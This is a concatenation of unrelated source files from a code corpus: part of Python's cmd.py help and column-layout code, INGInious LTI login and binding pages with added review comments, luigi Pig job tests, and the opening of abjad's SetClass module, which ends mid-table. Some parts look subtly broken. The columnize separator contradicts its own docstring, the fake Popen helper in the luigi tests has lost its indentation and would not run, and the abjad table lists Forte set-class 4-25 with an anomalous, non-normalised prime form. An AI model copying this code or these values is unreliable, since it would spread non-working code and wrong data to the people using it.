            endidx = readline.get_endidx() - stripped
            if begidx>0:
                # Completing an argument: look for complete_<cmd>.
                cmd, args, foo = self.parseline(line)
                if cmd == '':
                    compfunc = self.completedefault
                else:
                    try:
                        compfunc = getattr(self, 'complete_' + cmd)
                    except AttributeError:
                        compfunc = self.completedefault
            else:
                # Completing the command word itself.
                compfunc = self.completenames
            self.completion_matches = compfunc(text, line, begidx, endidx)
        try:
            return self.completion_matches[state]
        except IndexError:
            return None

    def get_names(self):
        # This method used to pull in base class attributes
        # at a time dir() didn't do it yet.
        return dir(self.__class__)

    def complete_help(self, *args):
        commands = set(self.completenames(*args))
        topics = set(a[5:] for a in self.get_names()
                     if a.startswith('help_' + args[0]))
        return list(commands | topics)

    def do_help(self, arg):
        if arg:
            # XXX check arg syntax
            try:
                func = getattr(self, 'help_' + arg)
            except AttributeError:
                # No help_<arg>; fall back to do_<arg>'s docstring.
                try:
                    doc=getattr(self, 'do_' + arg).__doc__
                    if doc:
                        self.stdout.write("%s\n"%str(doc))
                        return
                except AttributeError:
                    pass
                self.stdout.write("%s\n"%str(self.nohelp % (arg,)))
                return
            func()
        else:
            # No argument: list documented commands, misc help topics, and
            # undocumented commands, each under its own header.
            names = self.get_names()
            cmds_doc = []
            cmds_undoc = []
            help = {}
            for name in names:
                if name[:5] == 'help_':
                    help[name[5:]]=1
            names.sort()
            # There can be duplicates if routines overridden
            prevname = ''
            for name in names:
                if name[:3] == 'do_':
                    if name == prevname:
                        continue
                    prevname = name
                    cmd=name[3:]
                    if cmd in help:
                        cmds_doc.append(cmd)
                        del help[cmd]
                    elif getattr(self, name).__doc__:
                        cmds_doc.append(cmd)
                    else:
                        cmds_undoc.append(cmd)
            self.stdout.write("%s\n"%str(self.doc_leader))
            self.print_topics(self.doc_header,   cmds_doc,   15,80)
            self.print_topics(self.misc_header,  help.keys(),15,80)
            self.print_topics(self.undoc_header, cmds_undoc, 15,80)

    def print_topics(self, header, cmds, cmdlen, maxcol):
        if cmds:
            self.stdout.write("%s\n"%str(header))
            if self.ruler:
                # Underline the header with a ruler line of matching length.
                self.stdout.write("%s\n"%str(self.ruler * len(header)))
            self.columnize(cmds, maxcol-1)
            self.stdout.write("\n")

    def columnize(self, list, displaywidth=80):
        """Display a list of strings as a compact set of columns.

        Each column is only as wide as necessary.
        Columns are separated by two spaces (one was not legible enough).
        """
        if not list:
            self.stdout.write("<empty>\n")
            return

        nonstrings = [i for i in range(len(list))
                      if not isinstance(list[i], str)]
        if nonstrings:
            raise TypeError, ("list[i] not a string for i in %s" %
                              ", ".join(map(str, nonstrings)))
        size = len(list)
        if size == 1:
            self.stdout.write('%s\n'%str(list[0]))
            return
        # Try every row count from 1 upwards
        for nrows in range(1, len(list)):
            ncols = (size+nrows-1) // nrows
            colwidths = []
            totwidth = -2
            for col in range(ncols):
                colwidth = 0
                for row in range(nrows):
                    i = row + nrows*col
                    if i >= size:
                        break
                    x = list[i]
                    colwidth = max(colwidth, len(x))
                colwidths.append(colwidth)
                totwidth += colwidth + 2
                if totwidth > displaywidth:
                    break
            if totwidth <= displaywidth:
                break
        else:
            # Nothing fit: fall back to a single column.
            nrows = len(list)
            ncols = 1
            colwidths = [0]
        for row in range(nrows):
            texts = []
            for col in range(ncols):
                i = row + nrows*col
                if i >= size:
                    x = ""
                else:
                    x = list[i]
                texts.append(x)
            # Drop trailing empty cells on the last row.
            while texts and not texts[-1]:
                del texts[-1]
            for col in range(len(texts)):
                texts[col] = texts[col].ljust(colwidths[col])
            # NOTE(review): docstring above says columns are two spaces apart,
            # but the separator here is a single space — confirm against the
            # upstream cmd.py before relying on exact output widths.
            self.stdout.write("%s\n"%str(" ".join(texts)))
| gpl-3.0 |
UCL-INGI/INGInious | inginious/frontend/pages/lti.py | 1 | 12048 | # -*- coding: utf-8 -*-
#
# This file is part of INGInious. See the LICENSE and the COPYRIGHTS files for
# more information about the licensing of this file.
import flask
from flask import redirect
from werkzeug.exceptions import Forbidden, NotFound, MethodNotAllowed
from inginious.frontend.lti_request_validator import LTIValidator
from inginious.frontend.pages.utils import INGIniousPage, INGIniousAuthPage
from itsdangerous import want_bytes
from inginious.common import exceptions
from inginious.frontend.lti_tool_provider import LTIWebPyToolProvider
from inginious.frontend.pages.tasks import BaseTaskPage
class LTITaskPage(INGIniousAuthPage):
    """Serves (GET) and grades (POST) the task targeted by an LTI launch."""

    def is_lti_page(self):
        return True

    def _lti_task_ids(self):
        # Read the (courseid, taskid) pair stored by the LTI launch;
        # refuse access when the session carries no LTI data.
        lti_data = self.user_manager.session_lti_info()
        if lti_data is None:
            raise Forbidden(description=_("No LTI data available."))
        return lti_data['task']

    def GET_AUTH(self):
        courseid, taskid = self._lti_task_ids()
        return BaseTaskPage(self).GET(courseid, taskid, True)

    def POST_AUTH(self):
        courseid, taskid = self._lti_task_ids()
        return BaseTaskPage(self).POST(courseid, taskid, True)
class LTIAssetPage(INGIniousAuthPage):
    """Redirects an LTI-scoped asset request to the regular course asset URL."""

    def is_lti_page(self):
        return True

    def GET_AUTH(self, asset_url):
        """Redirect to ``/course/<courseid>/<asset_url>`` for the LTI course.

        :raises Forbidden: if the session contains no LTI launch data.
        """
        data = self.user_manager.session_lti_info()
        if data is None:
            raise Forbidden(description=_("No LTI data available."))
        # Only the course id is needed. Bind the unused task id to
        # ``_taskid`` rather than ``_``, which would shadow the gettext
        # alias used just above.
        (courseid, _taskid) = data['task']
        return redirect(self.app.get_homepath() + "/course/{courseid}/{asset_url}".format(courseid=courseid, asset_url=asset_url))
class LTIBindPage(INGIniousAuthPage):
    """Lets a logged-in INGInious user bind an LTI identity to their account."""

    def is_lti_page(self):
        # The user must be browsing with a regular (cookie-based) session here.
        return False

    def fetch_lti_data(self, sessionid):
        """Return ``(sessionid, lti_info)`` for the cookieless session *sessionid*.

        :raises KeyError: if no session with that id exists in the database.
        """
        # TODO : Flask session interface does not allow to open a specific session
        # It could be worth putting these information outside of the session dict
        sess = self.database.sessions.find_one({"_id": sessionid})
        if not sess:
            # BUG FIX: the original *returned* KeyError() instead of raising
            # it; callers then crashed with TypeError while unpacking the
            # result instead of reaching their ``except KeyError`` handler.
            raise KeyError(sessionid)
        cookieless_session = self.app.session_interface.serializer.loads(want_bytes(sess['data']))
        return sessionid, cookieless_session["lti"]

    def GET_AUTH(self):
        """Show the bind confirmation page for the given LTI session id."""
        # NOTE(review): the session id is read from the query string — confirm
        # that callers always pass it as a GET parameter.
        input_data = flask.request.args
        if "sessionid" not in input_data:
            return self.template_helper.render("lti_bind.html", success=False, sessionid="",
                                               data=None, error=_("Missing LTI session id"))
        try:
            cookieless_session_id, data = self.fetch_lti_data(input_data["sessionid"])
        except KeyError:
            return self.template_helper.render("lti_bind.html", success=False, sessionid="",
                                               data=None, error=_("Invalid LTI session id"))
        return self.template_helper.render("lti_bind.html", success=False,
                                           sessionid=cookieless_session_id, data=data, error="")

    def POST_AUTH(self):
        """Perform the actual binding of the LTI identity to the current user."""
        # NOTE(review): like GET_AUTH, this reads flask.request.args (the query
        # string) even though this is a POST — confirm this is intentional.
        input_data = flask.request.args
        if "sessionid" not in input_data:
            return self.template_helper.render("lti_bind.html", success=False, sessionid="",
                                               data=None, error=_("Missing LTI session id"))
        try:
            cookieless_session_id, data = self.fetch_lti_data(input_data["sessionid"])
        except KeyError:
            return self.template_helper.render("lti_bind.html", success=False, sessionid="",
                                               data=None, error=_("Invalid LTI session id"))

        # Verify the LTI data references an existing course and a consumer key
        # registered for that course.
        try:
            course = self.course_factory.get_course(data["task"][0])
            if data["consumer_key"] not in course.lti_keys().keys():
                raise Exception()
        except Exception:
            # Narrowed from a bare ``except:`` (which also swallowed
            # KeyboardInterrupt/SystemExit).
            return self.template_helper.render("lti_bind.html", success=False, sessionid="",
                                               data=None, error=_("Invalid LTI data"))

        if data:
            user_profile = self.database.users.find_one({"username": self.user_manager.session_username()})
            lti_user_profile = self.database.users.find_one(
                {"ltibindings." + data["task"][0] + "." + data["consumer_key"]: data["username"]})
            if not user_profile.get("ltibindings", {}).get(data["task"][0], {}).get(data["consumer_key"],
                                                                                    "") and not lti_user_profile:
                # There is no binding yet, so bind LTI to this account
                self.database.users.find_one_and_update({"username": self.user_manager.session_username()}, {"$set": {
                    "ltibindings." + data["task"][0] + "." + data["consumer_key"]: data["username"]}})
            elif not (lti_user_profile and user_profile["username"] == lti_user_profile["username"]):
                # There exists an LTI binding for another account, refuse auth!
                self.logger.info("User %s tried to bind LTI user %s in for %s:%s, but %s is already bound.",
                                 user_profile["username"],
                                 data["username"],
                                 data["task"][0],
                                 data["consumer_key"],
                                 user_profile.get("ltibindings", {}).get(data["task"][0], {}).get(data["consumer_key"], ""))
                return self.template_helper.render("lti_bind.html", success=False,
                                                   sessionid=cookieless_session_id,
                                                   data=data,
                                                   error=_("Your account is already bound with this context."))

        return self.template_helper.render("lti_bind.html", success=True,
                                           sessionid=cookieless_session_id, data=data, error="")
class LTILoginPage(INGIniousPage):
    """Logs in users arriving through an LTI launch, or shows the login page."""

    def is_lti_page(self):
        # This page only exists inside an LTI (cookieless) session.
        return True

    def GET(self):
        """
        Checks if user is authenticated and calls POST_AUTH or performs login and calls GET_AUTH.
        Otherwise, returns the login template.
        """
        data = self.user_manager.session_lti_info()
        if data is None:
            raise Forbidden(description=_("No LTI data available."))

        # Verify the LTI data references an existing course and a consumer key
        # registered for that course.
        try:
            course = self.course_factory.get_course(data["task"][0])
            if data["consumer_key"] not in course.lti_keys().keys():
                raise Exception()
        except Exception:
            # Narrowed from a bare ``except:``; error message now wrapped in
            # _() for consistency with the identical check in LTIBindPage.
            return self.template_helper.render("lti_bind.html", success=False, sessionid="",
                                               data=None, error=_("Invalid LTI data"))

        # If this LTI identity is already bound to an INGInious account,
        # log that account in directly.
        user_profile = self.database.users.find_one({"ltibindings." + data["task"][0] + "." + data["consumer_key"]: data["username"]})
        if user_profile:
            self.user_manager.connect_user(user_profile["username"], user_profile["realname"], user_profile["email"],
                                           user_profile["language"], user_profile.get("tos_accepted", False))

        if self.user_manager.session_logged_in():
            return redirect(self.app.get_homepath() + "/lti/task")

        return self.template_helper.render("lti_login.html")

    def POST(self):
        """
        Checks if user is authenticated and calls POST_AUTH or performs login and calls GET_AUTH.
        Otherwise, returns the login template.
        """
        return self.GET()
class LTILaunchPage(INGIniousPage):
    """
    Page called by the TC to start an LTI session on a given task
    """

    def GET(self, courseid, taskid):
        # LTI basic-launch requests are always POSTed by the Tool Consumer;
        # reject plain GETs.
        raise MethodNotAllowed()

    def POST(self, courseid, taskid):
        # Validate the launch, create a cookieless session, and redirect into
        # the /@<sessionid>@/ URL scheme: straight to the task when the LTI
        # identity is already bound to an INGInious account, otherwise to the
        # LTI login/bind page.
        (sessionid, loggedin) = self._parse_lti_data(courseid, taskid)
        if loggedin:
            return redirect(self.app.get_homepath() + "/@{}@/lti/task".format(sessionid))
        else:
            return redirect(self.app.get_homepath() + "/@{}@/lti/login".format(sessionid))

    def _parse_lti_data(self, courseid, taskid):
        """ Verify and parse the data for the LTI basic launch """
        post_input = flask.request.form
        self.logger.debug('_parse_lti_data:' + str(post_input))
        try:
            course = self.course_factory.get_course(courseid)
        except exceptions.CourseNotFoundException as ex:
            raise NotFound(description=_(str(ex)))

        # Verify the OAuth signature of the launch request against the
        # consumer keys registered for this course.
        try:
            # NOTE(review): from_webpy_request() is called with no arguments;
            # presumably it reads the current request from a global — confirm.
            test = LTIWebPyToolProvider.from_webpy_request()
            validator = LTIValidator(self.database.nonce, course.lti_keys())
            verified = test.is_valid_request(validator)
        except Exception as ex:
            self.logger.error("Error while parsing the LTI request : {}".format(str(post_input)))
            self.logger.error("The exception caught was : {}".format(str(ex)))
            raise Forbidden(description=_("Error while parsing the LTI request"))

        if verified:
            # NOTE(review): 'parse_lit_data' is a typo in this log message;
            # left untouched in this documentation-only pass.
            self.logger.debug('parse_lit_data for %s', str(post_input))
            user_id = post_input["user_id"]
            roles = post_input.get("roles", "Student").split(",")
            realname = self._find_realname(post_input)
            email = post_input.get("lis_person_contact_email_primary", "")
            lis_outcome_service_url = post_input.get("lis_outcome_service_url", None)
            outcome_result_id = post_input.get("lis_result_sourcedid", None)
            consumer_key = post_input["oauth_consumer_key"]

            if course.lti_send_back_grade():
                # Both outcome fields are required to POST grades back to the TC.
                if lis_outcome_service_url is None or outcome_result_id is None:
                    self.logger.info('Error: lis_outcome_service_url is None but lti_send_back_grade is True')
                    raise Forbidden(description=_("In order to send grade back to the TC, INGInious needs the parameters lis_outcome_service_url and "
                                                  "lis_outcome_result_id in the LTI basic-launch-request. Please contact your administrator."))
            else:
                # Grade passback disabled for this course: drop the outcome
                # fields even if the TC supplied them.
                lis_outcome_service_url = None
                outcome_result_id = None

            # Optional TC metadata, stored with the session for display.
            tool_name = post_input.get('tool_consumer_instance_name', 'N/A')
            tool_desc = post_input.get('tool_consumer_instance_description', 'N/A')
            tool_url = post_input.get('tool_consumer_instance_url', 'N/A')
            context_title = post_input.get('context_title', 'N/A')
            context_label = post_input.get('context_label', 'N/A')
            session_id = self.user_manager.create_lti_session(user_id, roles, realname, email, courseid, taskid, consumer_key,
                                                              lis_outcome_service_url, outcome_result_id, tool_name, tool_desc, tool_url,
                                                              context_title, context_label)
            loggedin = self.user_manager.attempt_lti_login()
            return session_id, loggedin
        else:
            self.logger.info("Couldn't validate LTI request")
            raise Forbidden(description=_("Couldn't validate LTI request"))

    def _find_realname(self, post_input):
        """ Returns the most appropriate name to identify the user """
        # First, try the full name
        if "lis_person_name_full" in post_input:
            return post_input["lis_person_name_full"]
        if "lis_person_name_given" in post_input and "lis_person_name_family" in post_input:
            # NOTE(review): the two parts are concatenated without a separator
            # (yields e.g. "JohnDoe"); confirm whether a space is wanted.
            return post_input["lis_person_name_given"] + post_input["lis_person_name_family"]
        # Then the email
        if "lis_person_contact_email_primary" in post_input:
            return post_input["lis_person_contact_email_primary"]
        # Then only part of the full name
        if "lis_person_name_family" in post_input:
            return post_input["lis_person_name_family"]
        if "lis_person_name_given" in post_input:
            return post_input["lis_person_name_given"]
        return post_input["user_id"]
| agpl-3.0 |
pkexcellent/luigi | test/contrib/pig_test.py | 36 | 5241 | # -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import subprocess
import tempfile
import luigi
from helpers import with_config, unittest
from luigi.contrib.pig import PigJobError, PigJobTask
from mock import patch
class SimpleTestJob(PigJobTask):
    """A minimal Pig job: a script path and a local output target only."""

    def output(self):
        return luigi.LocalTarget('simple-output')

    def pig_script_path(self):
        return "my_simple_pig_script.pig"
class ComplexTestJob(PigJobTask):
    """A Pig job exercising env vars, properties, parameters and CLI options."""

    def output(self):
        return luigi.LocalTarget('complex-output')

    def pig_script_path(self):
        return "my_complex_pig_script.pig"

    def pig_env_vars(self):
        return {'PIG_CLASSPATH': '/your/path'}

    def pig_properties(self):
        return {'pig.additional.jars': '/path/to/your/jar'}

    def pig_parameters(self):
        return {'YOUR_PARAM_NAME': 'Your param value'}

    def pig_options(self):
        return ['-x', 'local']
class SimplePigTest(unittest.TestCase):
    """Checks the pig command line built for a minimal PigJobTask.

    BUG FIX: the original ``test_run__fail`` reused ``p`` both for the saved
    ``subprocess.Popen`` and for the caught exception, so the ``finally`` block
    left ``subprocess.Popen`` replaced by a ``PigJobError`` instance, breaking
    every later test. The arglist assertion after ``job.run()`` was also
    unreachable (run always raises there); it now lives in the except block.
    The no-op setUp/tearDown overrides were removed.
    """

    @patch('subprocess.Popen')
    def test_run__success(self, mock):
        arglist_result = []
        original_popen = subprocess.Popen
        subprocess.Popen = _get_fake_Popen(arglist_result, 0)
        try:
            job = SimpleTestJob()
            job.run()
            self.assertEqual([['/usr/share/pig/bin/pig', '-f', 'my_simple_pig_script.pig']], arglist_result)
        finally:
            # Always restore the real Popen, whatever happened above.
            subprocess.Popen = original_popen

    @patch('subprocess.Popen')
    def test_run__fail(self, mock):
        arglist_result = []
        original_popen = subprocess.Popen
        subprocess.Popen = _get_fake_Popen(arglist_result, 1)
        try:
            job = SimpleTestJob()
            job.run()
        except PigJobError as error:
            self.assertEqual('stderr', error.err)
            self.assertEqual([['/usr/share/pig/bin/pig', '-f', 'my_simple_pig_script.pig']], arglist_result)
        else:
            self.fail("Should have thrown PigJobError")
        finally:
            subprocess.Popen = original_popen
class ComplexPigTest(unittest.TestCase):
    """Checks the pig command line and property file built by ComplexTestJob.

    BUG FIX: the original ``test_run__fail`` reused ``p`` both for the saved
    ``subprocess.Popen`` and for the caught exception, so the ``finally`` block
    left ``subprocess.Popen`` replaced by a ``PigJobError`` instance, breaking
    every later test. The no-op setUp/tearDown overrides were removed.
    """

    @patch('subprocess.Popen')
    def test_run__success(self, mock):
        arglist_result = []
        original_popen = subprocess.Popen
        subprocess.Popen = _get_fake_Popen(arglist_result, 0)
        try:
            job = ComplexTestJob()
            job.run()
            self.assertEqual([['/usr/share/pig/bin/pig', '-x', 'local', '-p', 'YOUR_PARAM_NAME=Your param value', '-propertyFile', 'pig_property_file', '-f', 'my_complex_pig_script.pig']], arglist_result)
            # Check property file
            with open('pig_property_file') as pprops_file:
                pprops = pprops_file.readlines()
            self.assertEqual(1, len(pprops))
            self.assertEqual('pig.additional.jars=/path/to/your/jar\n', pprops[0])
        finally:
            # Always restore the real Popen, whatever happened above.
            subprocess.Popen = original_popen

    @patch('subprocess.Popen')
    def test_run__fail(self, mock):
        arglist_result = []
        original_popen = subprocess.Popen
        subprocess.Popen = _get_fake_Popen(arglist_result, 1)
        try:
            job = ComplexTestJob()
            job.run()
        except PigJobError as error:
            self.assertEqual('stderr', error.err)
            self.assertEqual([['/usr/share/pig/bin/pig', '-x', 'local', '-p', 'YOUR_PARAM_NAME=Your param value', '-propertyFile', 'pig_property_file', '-f', 'my_complex_pig_script.pig']], arglist_result)
            # Check property file
            with open('pig_property_file') as pprops_file:
                pprops = pprops_file.readlines()
            self.assertEqual(1, len(pprops))
            self.assertEqual('pig.additional.jars=/path/to/your/jar\n', pprops[0])
        else:
            self.fail("Should have thrown PigJobError")
        finally:
            subprocess.Popen = original_popen
def _get_fake_Popen(arglist_result, return_code, *args, **kwargs):
def Popen_fake(arglist, shell=None, stdout=None, stderr=None, env=None, close_fds=True):
arglist_result.append(arglist)
class P(object):
def wait(self):
pass
def poll(self):
return 0
def communicate(self):
return 'end'
def env(self):
return self.env
p = P()
p.returncode = return_code
p.stderr = tempfile.TemporaryFile()
p.stdout = tempfile.TemporaryFile()
p.stdout.write(b'stdout')
p.stderr.write(b'stderr')
# Reset temp files so the output can be read.
p.stdout.seek(0)
p.stderr.seek(0)
return p
return Popen_fake
| apache-2.0 |
Abjad/abjad | abjad/pitch/SetClass.py | 1 | 55672 | from .. import math
from ..storage import StorageFormatManager
from .pitchclasses import NumberedPitchClass
from .sets import PitchClassSet
class SetClass:
"""
Set-class.
.. container:: example
Makes SG2 set-class from Forte rank:
>>> set_class = abjad.SetClass(4, 29)
>>> print(set_class)
SC(4-29){0, 1, 3, 7}
Makes SG2 set-class from lex rank:
>>> set_class = abjad.SetClass(4, 29, lex_rank=True)
>>> print(set_class)
SC(4-29){0, 3, 6, 9}
Makes SG1 set-class:
>>> set_class = abjad.SetClass(4, 29, transposition_only=True)
>>> print(set_class)
SC(4-29){0, 2, 6, 7}
.. container:: example
Makes aggregate:
>>> set_class = abjad.SetClass(12, 1, transposition_only=True)
>>> print(set_class)
SC(12-1){0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11}
.. container:: example
Lists SG2 tetrachords, pentachords, hexachords by Forte rank:
>>> set_classes = abjad.SetClass.list_set_classes(cardinality=4)
>>> for set_class in set_classes:
... print(set_class)
...
SC(4-1){0, 1, 2, 3}
SC(4-2){0, 1, 2, 4}
SC(4-3){0, 1, 3, 4}
SC(4-4){0, 1, 2, 5}
SC(4-5){0, 1, 2, 6}
SC(4-6){0, 1, 2, 7}
SC(4-7){0, 1, 4, 5}
SC(4-8){0, 1, 5, 6}
SC(4-9){0, 1, 6, 7}
SC(4-10){0, 2, 3, 5}
SC(4-11){0, 1, 3, 5}
SC(4-12){0, 2, 3, 6}
SC(4-13){0, 1, 3, 6}
SC(4-14){0, 2, 3, 7}
SC(4-15){0, 1, 4, 6}
SC(4-16){0, 1, 5, 7}
SC(4-17){0, 3, 4, 7}
SC(4-18){0, 1, 4, 7}
SC(4-19){0, 1, 4, 8}
SC(4-20){0, 1, 5, 8}
SC(4-21){0, 2, 4, 6}
SC(4-22){0, 2, 4, 7}
SC(4-23){0, 2, 5, 7}
SC(4-24){0, 2, 4, 8}
SC(4-25){2, 6, 8, 9}
SC(4-26){0, 3, 5, 8}
SC(4-27){0, 2, 5, 8}
SC(4-28){0, 3, 6, 9}
SC(4-29){0, 1, 3, 7}
>>> set_classes = abjad.SetClass.list_set_classes(cardinality=5)
>>> for set_class in set_classes:
... print(set_class)
...
SC(5-1){0, 1, 2, 3, 4}
SC(5-2){0, 1, 2, 3, 5}
SC(5-3){0, 1, 2, 4, 5}
SC(5-4){0, 1, 2, 3, 6}
SC(5-5){0, 1, 2, 3, 7}
SC(5-6){0, 1, 2, 5, 6}
SC(5-7){0, 1, 2, 6, 7}
SC(5-8){0, 2, 3, 4, 6}
SC(5-9){0, 1, 2, 4, 6}
SC(5-10){0, 1, 3, 4, 6}
SC(5-11){0, 2, 3, 4, 7}
SC(5-12){0, 1, 3, 5, 6}
SC(5-13){0, 1, 2, 4, 8}
SC(5-14){0, 1, 2, 5, 7}
SC(5-15){0, 1, 2, 6, 8}
SC(5-16){0, 1, 3, 4, 7}
SC(5-17){0, 1, 3, 4, 8}
SC(5-18){0, 1, 4, 5, 7}
SC(5-19){0, 1, 3, 6, 7}
SC(5-20){0, 1, 3, 7, 8}
SC(5-21){0, 1, 4, 5, 8}
SC(5-22){0, 1, 4, 7, 8}
SC(5-23){0, 2, 3, 5, 7}
SC(5-24){0, 1, 3, 5, 7}
SC(5-25){0, 2, 3, 5, 8}
SC(5-26){0, 2, 4, 5, 8}
SC(5-27){0, 1, 3, 5, 8}
SC(5-28){0, 2, 3, 6, 8}
SC(5-29){0, 1, 3, 6, 8}
SC(5-30){0, 1, 4, 6, 8}
SC(5-31){0, 1, 3, 6, 9}
SC(5-32){0, 1, 4, 6, 9}
SC(5-33){0, 2, 4, 6, 8}
SC(5-34){0, 2, 4, 6, 9}
SC(5-35){0, 2, 4, 7, 9}
SC(5-36){0, 1, 2, 4, 7}
SC(5-37){0, 3, 4, 5, 8}
SC(5-38){0, 1, 2, 5, 8}
>>> set_classes = abjad.SetClass.list_set_classes(cardinality=6)
>>> for set_class in set_classes:
... print(set_class)
...
SC(6-1){0, 1, 2, 3, 4, 5}
SC(6-2){0, 1, 2, 3, 4, 6}
SC(6-3){0, 1, 2, 3, 5, 6}
SC(6-4){0, 1, 2, 4, 5, 6}
SC(6-5){0, 1, 2, 3, 6, 7}
SC(6-6){0, 1, 2, 5, 6, 7}
SC(6-7){0, 1, 2, 6, 7, 8}
SC(6-8){0, 2, 3, 4, 5, 7}
SC(6-9){0, 1, 2, 3, 5, 7}
SC(6-10){0, 1, 3, 4, 5, 7}
SC(6-11){0, 1, 2, 4, 5, 7}
SC(6-12){0, 1, 2, 4, 6, 7}
SC(6-13){0, 1, 3, 4, 6, 7}
SC(6-14){0, 1, 3, 4, 5, 8}
SC(6-15){0, 1, 2, 4, 5, 8}
SC(6-16){0, 1, 4, 5, 6, 8}
SC(6-17){0, 1, 2, 4, 7, 8}
SC(6-18){0, 1, 2, 5, 7, 8}
SC(6-19){0, 1, 3, 4, 7, 8}
SC(6-20){0, 1, 4, 5, 8, 9}
SC(6-21){0, 2, 3, 4, 6, 8}
SC(6-22){0, 1, 2, 4, 6, 8}
SC(6-23){0, 2, 3, 5, 6, 8}
SC(6-24){0, 1, 3, 4, 6, 8}
SC(6-25){0, 1, 3, 5, 6, 8}
SC(6-26){0, 1, 3, 5, 7, 8}
SC(6-27){0, 1, 3, 4, 6, 9}
SC(6-28){0, 1, 3, 5, 6, 9}
SC(6-29){0, 1, 3, 6, 8, 9}
SC(6-30){0, 1, 3, 6, 7, 9}
SC(6-31){0, 1, 3, 5, 8, 9}
SC(6-32){0, 2, 4, 5, 7, 9}
SC(6-33){0, 2, 3, 5, 7, 9}
SC(6-34){0, 1, 3, 5, 7, 9}
SC(6-35){0, 2, 4, 6, 8, 10}
SC(6-36){0, 1, 2, 3, 4, 7}
SC(6-37){0, 1, 2, 3, 4, 8}
SC(6-38){0, 1, 2, 3, 7, 8}
SC(6-39){0, 2, 3, 4, 5, 8}
SC(6-40){0, 1, 2, 3, 5, 8}
SC(6-41){0, 1, 2, 3, 6, 8}
SC(6-42){0, 1, 2, 3, 6, 9}
SC(6-43){0, 1, 2, 5, 6, 8}
SC(6-44){0, 1, 2, 5, 6, 9}
SC(6-45){0, 2, 3, 4, 6, 9}
SC(6-46){0, 1, 2, 4, 6, 9}
SC(6-47){0, 1, 2, 4, 7, 9}
SC(6-48){0, 1, 2, 5, 7, 9}
SC(6-49){0, 1, 3, 4, 7, 9}
SC(6-50){0, 1, 4, 6, 7, 9}
There are 352 SG1 set-classes and 224 SG2 set-classes.
"""
### CLASS VARIABLES ##
__slots__ = (
"_cardinality",
"_lex_rank",
"_prime_form",
"_rank",
"_transposition_only",
)
_forte_identifier_to_prime_form = {
# 0
(0, 1): (),
# 1
(1, 1): (0,),
# 2
(2, 1): (0, 1),
(2, 2): (0, 2),
(2, 3): (0, 3),
(2, 4): (0, 4),
(2, 5): (0, 5),
(2, 6): (0, 6),
# 3
(3, 1): (0, 1, 2),
(3, 2): (0, 1, 3),
(3, 3): (0, 1, 4),
(3, 4): (0, 1, 5),
(3, 5): (0, 1, 6),
(3, 6): (0, 2, 4),
(3, 7): (0, 2, 5),
(3, 8): (0, 2, 6),
(3, 9): (0, 2, 7),
(3, 10): (0, 3, 6),
(3, 11): (0, 3, 7),
(3, 12): (0, 4, 8),
# 4
(4, 1): (0, 1, 2, 3),
(4, 2): (0, 1, 2, 4),
(4, 3): (0, 1, 3, 4),
(4, 4): (0, 1, 2, 5),
(4, 5): (0, 1, 2, 6),
(4, 6): (0, 1, 2, 7),
(4, 7): (0, 1, 4, 5),
(4, 8): (0, 1, 5, 6),
(4, 9): (0, 1, 6, 7),
(4, 10): (0, 2, 3, 5),
(4, 11): (0, 1, 3, 5),
(4, 12): (0, 2, 3, 6),
(4, 13): (0, 1, 3, 6),
(4, 14): (0, 2, 3, 7),
(4, 15): (0, 1, 4, 6),
(4, 16): (0, 1, 5, 7),
(4, 17): (0, 3, 4, 7),
(4, 18): (0, 1, 4, 7),
(4, 19): (0, 1, 4, 8),
(4, 20): (0, 1, 5, 8),
(4, 21): (0, 2, 4, 6),
(4, 22): (0, 2, 4, 7),
(4, 23): (0, 2, 5, 7),
(4, 24): (0, 2, 4, 8),
(4, 25): (9, 2, 6, 8),
(4, 26): (0, 3, 5, 8),
(4, 27): (0, 2, 5, 8),
(4, 28): (0, 3, 6, 9),
(4, 29): (0, 1, 3, 7),
# 5
(5, 1): (0, 1, 2, 3, 4),
(5, 2): (0, 1, 2, 3, 5),
(5, 3): (0, 1, 2, 4, 5),
(5, 4): (0, 1, 2, 3, 6),
(5, 5): (0, 1, 2, 3, 7),
(5, 6): (0, 1, 2, 5, 6),
(5, 7): (0, 1, 2, 6, 7),
(5, 8): (0, 2, 3, 4, 6),
(5, 9): (0, 1, 2, 4, 6),
(5, 10): (0, 1, 3, 4, 6),
(5, 11): (0, 2, 3, 4, 7),
(5, 12): (0, 1, 3, 5, 6),
(5, 13): (0, 1, 2, 4, 8),
(5, 14): (0, 1, 2, 5, 7),
(5, 15): (0, 1, 2, 6, 8),
(5, 16): (0, 1, 3, 4, 7),
(5, 17): (0, 1, 3, 4, 8),
(5, 18): (0, 1, 4, 5, 7),
(5, 19): (0, 1, 3, 6, 7),
(5, 20): (0, 1, 3, 7, 8),
(5, 21): (0, 1, 4, 5, 8),
(5, 22): (0, 1, 4, 7, 8),
(5, 23): (0, 2, 3, 5, 7),
(5, 24): (0, 1, 3, 5, 7),
(5, 25): (0, 2, 3, 5, 8),
(5, 26): (0, 2, 4, 5, 8),
(5, 27): (0, 1, 3, 5, 8),
(5, 28): (0, 2, 3, 6, 8),
(5, 29): (0, 1, 3, 6, 8),
(5, 30): (0, 1, 4, 6, 8),
(5, 31): (0, 1, 3, 6, 9),
(5, 32): (0, 1, 4, 6, 9),
(5, 33): (0, 2, 4, 6, 8),
(5, 34): (0, 2, 4, 6, 9),
(5, 35): (0, 2, 4, 7, 9),
(5, 36): (0, 1, 2, 4, 7),
(5, 37): (0, 3, 4, 5, 8),
(5, 38): (0, 1, 2, 5, 8),
# 6
(6, 1): (0, 1, 2, 3, 4, 5),
(6, 2): (0, 1, 2, 3, 4, 6),
(6, 3): (0, 1, 2, 3, 5, 6),
(6, 4): (0, 1, 2, 4, 5, 6),
(6, 5): (0, 1, 2, 3, 6, 7),
(6, 6): (0, 1, 2, 5, 6, 7),
(6, 7): (0, 1, 2, 6, 7, 8),
(6, 8): (0, 2, 3, 4, 5, 7),
(6, 9): (0, 1, 2, 3, 5, 7),
(6, 10): (0, 1, 3, 4, 5, 7),
(6, 11): (0, 1, 2, 4, 5, 7),
(6, 12): (0, 1, 2, 4, 6, 7),
